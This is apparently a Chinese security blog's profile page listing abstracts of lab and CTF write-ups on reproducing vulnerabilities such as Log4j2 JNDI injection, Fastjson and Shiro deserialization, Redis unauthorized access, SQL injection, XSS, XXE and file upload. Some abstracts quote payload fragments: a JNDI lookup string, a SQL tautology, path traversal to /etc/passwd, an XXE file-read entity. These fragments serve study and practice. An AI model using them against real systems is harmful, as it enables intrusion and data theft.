- 博客(30)
- 收藏
- 关注
原创 Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
本文详细分析了Apache Log4j2 JNDI注入漏洞(CVE-2021-44228)的成因与利用过程。该漏洞源于Log4j2的lookup机制在处理日志时会解析${}表达式,攻击者可构造类似${jndi:ldap://恶意地址}的特殊请求,当应用记录该日志时即触发远程代码执行。实验复现了在Apache Solr 8.11.0(使用Log4j2 2.14.1)中的漏洞利用过程:通过dnslog验证漏洞存在后,搭建恶意LDAP服务并发送精心构造的JNDI请求,最终成功获取目标系统的反弹shell。该漏洞影
2025-09-26 15:19:40
965
原创 Fastjson 1.2.24/47反序列化漏洞(CVE-2017-18349)复现
Fastjson反序列化漏洞分析(1.2.24/1.2.47版本) 摘要: Fastjson作为高性能Java JSON库,在1.2.24及以下版本存在严重反序列化漏洞。攻击者利用AutoType功能,通过@type指定恶意类(如com.sun.rowset.JdbcRowSetImpl)触发JNDI注入。漏洞检测可通过DNSLog探测,复现过程涉及搭建RMI服务、编译恶意class文件并诱导目标服务器连接。1.2.47版本虽引入黑名单,但攻击者仍能通过java.lang.Class缓存机制绕过检测。防范建
2025-09-24 18:50:05
1000
原创 APache shiro-550 CVE-2016-4437复现
摘要:本文分析了Apache Shiro框架的反序列化漏洞原理,攻击者通过伪造RememberMe cookie,利用AES加密密钥构造恶意对象实现反序列化攻击。漏洞影响Shiro 1.2.4及以下版本。复现过程包括使用工具爆破密钥、检测利用链、执行命令注入及内存马攻击,并通过手动构造恶意cookie反弹shell。文章详细演示了利用JRMPListener启动RMI服务、生成恶意cookie的Python脚本编写,最终成功获取靶机shell权限,展示了完整的漏洞利用流程。
2025-09-23 22:37:03
532
原创 Weblogic T3 CVE-2018-2628漏洞复现
摘要:WebLogic T3协议反序列化漏洞(CVE-2018-2628)存在于10.3.6.0等版本中,攻击者可通过构造恶意T3协议数据触发反序列化操作,利用JRMP监听器实现远程代码执行。复现过程包含:1)扫描目标开放T3服务;2)使用ysoserial工具启动JRMP监听;3)通过POC发送恶意payload使服务器连接攻击者控制的RMI服务;4)最终获取服务器shell权限。该漏洞特点在于利用JRMPClient机制实现间接攻击,而非直接发送完整恶意代码。
2025-09-23 13:41:12
1155
原创 正向shell,反弹shell学习
鉴于最近不知道为什么我的博客网站被冻结了.....今天又来这里记笔记了哈哈。今天打算通过VMware实验学习一把关于正向shell和反弹shell的学习。靶机:192.168.112.150攻击机:192.168.112.152。
2025-09-20 20:13:35
863
原创 vulhub漏洞复现-redis-4-unacc (redis未授权访问)
摘要:本文演示了Redis未授权访问漏洞的利用过程。漏洞影响版本低于6.x,主要由于未配置访问控制和密码认证所致。攻击者通过nmap扫描发现靶机开放6379端口后,使用redis-rogue-getshell工具建立主从复制连接,成功在目标系统执行命令。复现过程包括环境搭建、未授权连接验证和利用主从复制模式实现远程代码执行,展示了该高危漏洞的实际危害。
2025-09-12 15:23:41
629
原创 Nmap图形化工具-zenmap安装及使用教程
Nmap扫描技术摘要:本文介绍了Nmap工具常用的扫描方式及其参数配置。Intense scan系列包含TCP/UDP扫描、全端口扫描和绕过Ping检测的选项;Quick scan提供快速端口探测;Regular scan为默认行为;Ping scan用于主机存活检测;Slow comprehensive scan则是全面扫描方案。关键参数包括-T4(加速扫描)、-A(组合扫描)、-sS(SYN隐蔽扫描)、-sU(UDP扫描)等。不同扫描方式适用于不同场景,如渗透测试、安全评估等,使用需遵循授权原则。文中还
2025-09-11 00:05:32
987
原创 pikachu之sql注入
本文系统介绍了多种SQL注入攻击技术,包括字符型注入、insert/update注入、delete注入、HTTP头注入、布尔盲注、时间盲注和宽字节注入等。通过Pikachu靶场实例,详细演示了各类注入的原理和攻击方法:字符型注入通过构造'or 1=1#获取数据;insert/update注入利用报错函数获取数据库信息;delete注入通过恶意参数触发SQL错误;HTTP头注入在User-Agent等字段注入恶意代码;布尔/时间盲注通过页面响应差异推断数据;宽字节注入则巧妙绕过转义机制。文章特别分析了宽字节注
2025-09-04 03:25:01
1447
原创 pikachu之 unsafe upfileupload (不安全的文件上传漏洞)
本文概述了Web应用系统中文件上传功能存在的安全漏洞及多种绕过验证的攻击方法。主要介绍了客户端校验、MIME类型验证、getimagesize()函数检测等常见安全防护手段的绕过技巧,包括修改文件后缀、伪造文件头、利用00截断、.htaccess解析漏洞、.user.ini配置攻击等。同时阐述了配合文件包含漏洞触发图片马的原理,以及突破MIME限制、条件竞争、CONTENT-LENGTH绕过等攻击方式。这些漏洞利用展示了当服务器端验证不严谨时,攻击者可上传恶意文件获取服务器控制权,强调了文件上传功能必须实施
2025-09-02 17:46:05
1341
原创 pikachu之XSS
XSS(跨站脚本)是一种常见的Web安全漏洞,主要通过注入恶意脚本攻击用户浏览器。文章详细介绍了XSS的三种类型(反射型、存储型、DOM型)、攻击原理及危害,并通过实例演示了如何利用输入框、URL参数等方式实施XSS攻击。同时提供了防御措施,包括输入过滤和输出转义,特别强调了htmlspecialchars()函数的使用及注意事项。文章还探讨了XSS绕过过滤的各种技术,如使用HTML实体、JavaScript协议等,为Web安全防护提供了实践指导。
2025-08-30 11:32:58
1092
原创 pikachu之不安全的url跳转
摘要:不安全的URL跳转漏洞出现在使用前端传入参数作为跳转目标且未校验的情况下,可能导致钓鱼攻击。攻击者可利用可信域名掩盖恶意跳转。测试案例中,通过修改参数url=http://www.baidu.com成功实现跳转,证实存在漏洞,该漏洞可能被利用进行钓鱼等恶意行为。(98字)
2025-08-26 10:00:51
209
原创 pikachu之Unsafe Filedownload
文件下载功能存在安全风险,当后台未对前端传入的文件名进行安全过滤时,攻击者可构造恶意路径(如../../../etc/passwd)下载服务器敏感文件。通过pikachu靶场演示,修改filename参数可成功下载README.md和/etc/passwd等文件,证明存在任意文件下载漏洞。开发时需对前端传入数据进行严格校验,防止敏感信息泄露。
2025-08-25 16:52:30
212
原创 pikachu之Over permission
文章摘要:本文分析了水平越权和垂直越权两种漏洞。水平越权表现为用户通过修改URL参数(如ID)访问他人信息;垂直越权则是低权限用户越权使用高权限功能。测试发现,普通用户pikachu通过修改URL(将op2_user.php改为op2_admin_edit.php)可执行管理员专属的添加用户功能,存在垂直越权漏洞,而类似op2_admin.php的访问则需登录,未发现越权。通过传参分析可有效识别此类逻辑漏洞。
2025-08-25 16:26:45
297
原创 pikachu靶场之XXE漏洞
XXE漏洞(XML外部实体注入)是攻击者通过注入恶意XML实体,使服务器执行非预期操作的安全漏洞。XML与HTML不同,用于数据传输而非显示,其标签可自定义。XML实体类似变量,包括预定义实体、内部实体和外部实体。XXE攻击利用外部实体(如file://协议)读取服务器敏感文件(如/etc/passwd)。当服务器未严格过滤用户输入的XML数据时,攻击者可注入恶意实体(如<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">)窃取数
2025-08-25 15:35:39
727
原创 pikachu靶场-CSRF
CSRF(跨站请求伪造)是一种利用用户身份进行恶意操作的攻击方式。攻击者诱导用户点击伪造链接或访问恶意页面,利用浏览器自动携带cookie的特性,以用户身份执行非授权操作。文章通过银行转账案例和Pikachu靶场实验,演示了GET/POST两种方式的CSRF攻击实现,以及防御措施——Token验证机制的工作原理:服务器生成随机Token存入Session和表单,提交时验证Token一致性后销毁,从而有效防止CSRF攻击。
2025-08-24 23:53:03
1296
原创 PIkachu靶场---目录遍历漏洞
摘要:目录遍历漏洞是由于应用程序未对用户输入进行严格过滤,允许攻击者通过构造特殊路径(如../或%2e%2e/)访问受限文件。以Pikachu靶场为例,通过参数title=../../../README.md成功读取上级目录文件。该漏洞利用服务器文件系统特性,通过多次回退目录可访问任意文件(如/etc/passwd)。常见绕过技巧包括URL编码(%2e%2e/)、双重编码(%252e%252e%252f)和操作系统特性(如Windows的..%5c)。漏洞核心在于require/include等文件包含函数
2025-08-23 18:11:59
746
原创 ctfshow ssrf web 351-354
本文介绍了四道CTF题目的解题思路,主要利用cURL进行SSRF攻击。web351展示了如何通过本地回环地址(127.0.0.1/localhost)访问受限资源;web352分析了parse_url()函数的使用,并指出正则表达式写法漏洞;web353和web354则展示了多种IP地址编码绕过方式(十进制、十六进制、八进制)和特殊域名(localtest.me等)的利用技巧。这些题目层层递进,演示了SSRF漏洞从基础到高级的多种利用方法,特别强调了本地请求与外部请求的区别以及各种绕过过滤的技巧。
2025-08-20 22:41:17
279
原创 CSRF和SSRF学习
CSRF(跨站请求伪造)利用用户已登录的会话cookie,诱骗浏览器发送恶意请求(如银行转账)。攻击者通过嵌入恶意链接(如论坛图片)诱导用户点击,利用自动携带的cookie完成非授权操作。 SSRF(服务器端请求伪造)欺骗服务器发起非预期请求(如访问内网资源)。常见于文件处理、URL转发等场景,攻击者通过构造恶意输入(如SVG文件嵌入元数据链接)使服务器访问敏感信息(如云服务密钥)。 案例:攻击者上传含内网元数据链接的SVG头像,触发服务器请求并泄露实例ID等关键信息,为后续攻击提供入口。两者均需严格验证请
2025-08-20 21:54:03
1133
原创 sqli-labs靶场less5/8(更新中)
本文介绍了利用extractvalue()和updatexml()函数进行SQL报错注入的方法。通过concat()函数拼接特殊字符0x7e(~)触发报错,成功获取数据库名(security)、表名、列名和密码数据。两种函数都利用了XML处理函数的特性:当XPath参数包含非法字符时,MySQL会在报错信息中显示该参数内容,从而泄露数据库信息。
2025-08-12 18:31:37
596
原创 CTFshow-web入门 XSS316-333(已更新完)
本文系统总结了XSS跨站脚本攻击的实战技巧,重点分析了反射型和存储型XSS的利用方法。通过系列靶场案例(web316-333),详细演示了不同过滤条件下的绕过方式:1)使用body/iframe/svg标签替代script;2)通过/**/注释符绕过空格过滤;3)利用window.open/document.cookie窃取会话信息;4)结合AJAX实现POST请求攻击。特别对存储型XSS的自动化利用场景(如修改管理员密码、资金转账)进行了深入剖析,展示了如何通过恶意脚本控制目标账户。文章还提供了CEYE监
2025-08-03 15:16:46
1521
2
原创 适合小白的ctfshow web入门 文件上传漏洞web151-web155
题目如下查看源代码,在这里我们发现了后端处理上传的是php脚本,要求上传文件格式为png。首先,后端处理上传的是php脚本,那么我们可以编写一句话木马,然后想办法上传木马文件。
2025-08-01 21:05:43
278
原创 ctfshow web入门 php特性
我们需要使intval($num)的值为1,就可以输出flag。1.preg_match函数传入的参数只能是字符串,如果传入数组这种会报错,返回FALSE(0),可以实现preg_match()函数的绕过。2.intval中输入?num[]=1即可,因为num[]=1是一个非空数组,元素为1会使intval($num)返回为1。
2025-08-01 20:17:01
296
原创 OWASP Top10的简单学习
OWASP Top 10安全漏洞概述:1.错误的访问控制(如IDOR漏洞)允许越权访问敏感数据;2.加密失败导致MITM中间人攻击风险;3.注入漏洞(SQL/命令注入)可能引发数据泄露或系统入侵;4.不安全设计指开发阶段存在的固有缺陷;5.安全配置错误包括默认凭证、调试信息泄露等;6.过时组件包含已知漏洞(如RCE);7.认证缺陷使暴力破解成为可能;8.数据完整性故障导致文件被篡改;9.日志监控不足影响攻击溯源;10.SSRF漏洞利用服务器发起非预期请求。这些漏洞可能造成数据泄露、系统入侵等严重后果,需通过
2025-08-01 14:28:22
1023
原创 旁注与C段的简单学习
旁注攻击和C段攻击都是针对防护较强目标采用的迂回渗透策略。旁注攻击针对同服务器上的其他站点,通过获取服务器权限间接控制目标网站;C段攻击则针对同一IP段的其他服务器,利用漏洞横向渗透至目标服务器。这两种方式都需要攻击者具备网络扫描、漏洞利用和权限提升等技术,通过寻找薄弱环节实现最终攻击目的。
2025-07-30 16:08:43
480
转载 FOFA的基本使用学习
FOFA是一款网络空间测绘搜索引擎,提供丰富的搜索语法:支持域名查询(host)、标题搜索(title)、HTTP头检查(header)、内容检索(body)、端口扫描(port)、状态码过滤(status_code)、国家限定(country)等。支持逻辑运算符(&&、||)和组合查询,还可进行IP段搜索和时间范围查询。国内类似平台包括奇安信Hunter(备案关联)、ZoomEye(资产监控)、360Quake(分类精准)、Sumap(漏洞搜索)等,各具特色,适用于不同安全场景。这些工具为
2025-07-30 13:50:26
146
原创 CTFshow web入门 sql注入171-180 (每天更新)
其实我们可以将id换成'a',然后查询password,但是password也过滤了数字,这里我们可以使用sql的字符串函数replace,使password里面的数字全部替换成大写字母,然后查询出后再把大写字母转成数字,但是注意,一般比赛中password输出一般是flag{}的形式,由于flag也被过滤,那种情况我们也需要将flag中的某一个字母替换,这里我将g替换成K,但是本题是ctfshow{}的形式,所以其实不必要的。由题目可以看到单引号闭合,然后测试是否是字符型,发现是的。
2025-07-29 00:20:45
378
原创 ctfshow web入门 爆破21-28(每天更新)
本文演示了如何通过爆破攻击获取靶场登录权限。首先猜测用户名为admin,密码为123,使用Burp抓包发现Authorization字段包含Base64编码的"admin:123"。通过Burp Intruder设置爆破攻击:将编码后的字符串设为变量,采用Sniper模式,添加题目提供的字典作为payload。处理规则包括添加"admin:"前缀和Base64编码,并取消URL编码以避免干扰Base64的特殊字符。经过爆破后,成功获取响应并拿到flag。整个过程展示了
2025-07-23 16:51:15
176
原创 ctfshow web入门靶场1-20(已更新完)
本文总结了多种Web信息泄露漏洞的发现方法,包括:1)查看网页源代码获取敏感信息;2)通过robots.txt、phps源码、www.zip等文件泄露;3)版本控制工具git/svn泄露;4)vim缓存文件泄露;5)cookie信息泄露;6)域名解析记录查询;7)默认密码和公开信息利用;8)技术文档敏感信息;9)编辑器目录遍历;10)备份文件(sql/mdb)泄露等。文章详细介绍了每种漏洞的利用方式和具体案例,为渗透测试提供了实用参考。
2025-07-23 14:52:39
565
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人